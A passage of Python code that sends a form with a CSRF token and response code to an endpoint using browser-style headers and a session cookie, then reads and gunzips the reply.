            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip',
            'Referer': self.endpoint,
            'Cookie': self.cookie,
        }
        req = Request(self.endpoint, headers=headers)

        form = {'csrfmiddlewaretoken': self.csrftoken, 'response_code': response_code}
        encoded_form = urlencode(form).encode('ascii')
        res = urlopen(req, data=encoded_form, timeout=self.timeout)

        gzipped = res.info().get('Content-Encoding') == 'gzip'
        raw = res.read()
        if gzipped:
            raw = gzip.GzipFile(fileobj=BytesIO(raw)).read()

        return res.code, raw.decode('utf-8')


问题


面经


文章

微信
公众号

扫码关注公众号